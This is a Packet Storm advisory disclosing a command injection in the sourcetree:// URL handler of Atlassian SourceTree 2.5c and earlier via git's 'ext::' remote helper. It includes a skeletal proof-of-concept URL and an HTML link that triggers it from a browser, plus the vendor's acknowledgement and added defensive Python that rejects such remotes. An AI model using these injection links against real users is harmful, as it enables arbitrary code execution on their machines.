Atlassian SourceTree 2.5c Client URL Handler Command Injection

2017-05-04T00:00:00
ID PACKETSTORM:142393
Type packetstorm
Reporter redrain
Modified 2017-05-04T00:00:00

Description

                                        
                                            `  
Author: redrain, hongyu-s[at]360.cn  
Date: 2017-03-02  
Version: 2.5c and prior  
Platform: macOS, Windows, Linux Desktop  
Site: https://www.sourcetreeapp.com  
Vendor: Atlassian  
Vendor Notified: 2017-03-02  
  
  
Technical Details:  
========================================  
  
SourceTree v2.5c and prior are affected by a command injection in the handling of sourcetree:// scheme.  
The cloneRepo action with "ext" is based on git-remote-ext. The git team's description of the bug was:  
Some protocols (like git-remote-ext) can execute arbitrary code found in the URL.  
PoC:  
sourcetree://cloneRepo/ext::[command injection]  
An attacker can even exploit it through the browser:  
<html>  
<head></head>  
<body>  
<a href=sourcetree://checkoutRef/ext::id>a</a>  
</body>  
</html>  
There is a simple demo video:  
https://youtu.be/SQ1_Ht-0Bdo  
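
A handler-side check for the cloneRepo link above, added here as an example; it is not part of the original advisory and not SourceTree's code. It assumes the remote follows `sourcetree://cloneRepo/` as in the PoC, and the function names and allow-list are hypothetical; it rejects remote-helper syntax such as `ext::` before git runs and sets git's `GIT_ALLOW_PROTOCOL` as a second layer.

```python
import os
import re
from urllib.parse import urlsplit

# Assumed policy: the only transports this client needs (ext:: and fd:: excluded).
ALLOWED_SCHEMES = ("git", "https", "ssh")
# "<name>::<address>" makes git run the helper git-remote-<name>, e.g. ext::.
REMOTE_HELPER = re.compile(r"^[A-Za-z0-9][A-Za-z0-9+.-]*::")
SCP_LIKE = re.compile(r"^[A-Za-z0-9._-]+@[A-Za-z0-9][A-Za-z0-9.-]*:[A-Za-z0-9._~/-]+$")
HOSTNAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]*$")  # must not start with "-"
PREFIX = "sourcetree://cloneRepo/"  # link layout taken from the PoC above


def extract_remote(link):
    """Return the text after sourcetree://cloneRepo/, or None for other links."""
    return link[len(PREFIX):] if link.startswith(PREFIX) else None


def is_safe_remote(remote):
    """Allow-list check on the exact string that would be handed to git."""
    if not remote or remote.startswith("-"):  # empty, or parsed as an option
        return False
    if any(ord(c) < 0x21 or ord(c) == 0x7F for c in remote):  # space/control
        return False
    if REMOTE_HELPER.match(remote):  # ext::, fd:: or any other remote helper
        return False
    if SCP_LIKE.match(remote):  # user@host:path shorthand for ssh
        return True
    try:
        parts = urlsplit(remote)
        host = parts.hostname or ""
    except ValueError:  # malformed authority, e.g. broken IPv6 brackets
        return False
    return parts.scheme.lower() in ALLOWED_SCHEMES and bool(HOSTNAME.match(host))


def clone_command(link, dest):
    """Return (argv, env) for a vetted clone; raise ValueError otherwise."""
    remote = extract_remote(link)
    if remote is None or not is_safe_remote(remote):
        raise ValueError("rejected repository link")
    # Second layer: git refuses unlisted transports, and "--" ends option parsing.
    env = dict(os.environ, GIT_ALLOW_PROTOCOL=":".join(ALLOWED_SCHEMES))
    return ["git", "clone", "--", remote, dest], env
```

Pass the returned list and environment to the process launcher directly, without a shell, so the remote is never re-parsed.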
  
  
Other:  
============================================  
And there is the last bugtrack I reported:  
  
  
Activity  
Your request status changed to Resolved with resolution Tracked Elsewhere.  
03/Mar/17 5:35 PM  
Alexander Minozhenko, 03/Mar/17 5:34 PM  
Hi rootredrain,  
Thank you for sending this notification to Atlassian. This is indeed a vulnerability and an issue has been filed on an internal tracker.  
The issue is SRCTREE-4632. Unfortunately, this issue is not accessible externally, so you will not be able to monitor its progress. Feel free to check with us for updates.  
redrain, 02/Mar/17 5:43 PM  
sourcetree_vuln.7z (9.62 MB)  
Details, 02/Mar/17 5:43 PM  
Product or Service: Other  
Product Version: 2.4.1a and earlier  
Description:  
SourceTree v2.4.1a and earlier are affected by a command injection in the handling of sourcetree:// scheme.  
The cloneRepo action with "ext" is based on git-remote-ext. The git team's description of the bug was:  
Some protocols (like git-remote-ext) can execute arbitrary code found in the URL.  
PoC:  
sourcetree://cloneRepo/ext::[command injection]  
An attacker can even exploit it through the browser.  
There is a simple demo in the attachment.  
  
  
Regards,  
redrain  
  
`